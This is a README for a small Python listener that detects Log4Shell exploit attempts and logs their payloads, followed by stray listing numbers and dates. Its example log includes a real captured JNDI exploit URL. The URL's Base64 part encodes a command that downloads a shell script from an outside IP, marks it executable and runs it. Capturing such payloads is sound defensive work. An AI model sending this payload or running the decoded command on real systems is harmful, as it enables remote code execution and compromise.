log4j_catcher
Log4j exploit catcher, detect Log4Shell exploits and try to get payloads. This is a basic python server that listen on a port and logs informations when a wild log4j exploit appears
Running
python3 detector.py [port]
Example:
$ sudo python3 detector.py 80
2021-12-10 23:39:59,951 INFO:Incoming connection from ('1.2.3.4', 51512)
2021-12-10 23:40:28,997 INFO:Incoming connection from ('1.2.3.4', 37532)
2021-12-11 03:53:36,729 INFO:Found payload jndi from ('45.137.21.9', 55378)
2021-12-11 03:53:36,729 INFO:URL: 45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==
Data is logged into current directory path.
3 Jan 28, 2022
47 Nov 09, 2022
43 Dec 03, 2022
204 Dec 13, 2022
13 Jul 04, 2021
300 Dec 28, 2022
15 May 21, 2022
95 Dec 26, 2022
79 Dec 27, 2022
23 Nov 09, 2022
1 May 06, 2022
24 Nov 09, 2022
187 Jan 03, 2023
41 Nov 22, 2022
8.1k Dec 31, 2022
70 Nov 30, 2022
8 Nov 10, 2022
25 Dec 04, 2022
1 Dec 25, 2021
125 Dec 09, 2022